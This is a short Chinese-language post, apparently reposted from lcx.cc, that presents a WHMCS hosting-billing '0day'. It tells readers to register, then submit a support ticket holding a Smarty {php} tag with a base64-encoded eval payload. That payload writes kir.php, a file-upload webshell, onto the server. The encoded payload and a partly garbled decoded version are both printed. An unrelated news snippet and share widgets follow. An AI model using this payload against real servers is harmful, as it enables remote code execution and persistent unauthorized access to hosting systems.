先注册个id
提交一个ticket如下
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}
base64解密后:
$code = echo '
';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!
'; }
else { echo 'Upload GAGAL !!!
'; }
}
?>
$fo = fopen("kir.php","w");
fwrite($fo,$code);
则成功创建了一个php小马
文章来源于lcx.cc:whmcs主机管理系统0day
“单向思维女孩”作者玛格尼斯称自己的邮箱遭到英国媒体非法入侵 中新网7月15日电 据香港《文汇报》网站15日报道,传媒大亨默多克旗下的英国报纸丑闻越揭越多,连《星期日泰晤士报》也牵涉其中。两名英国女性色情博客作者声称,该报用“木马”黑客程序入侵她们的电邮,…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论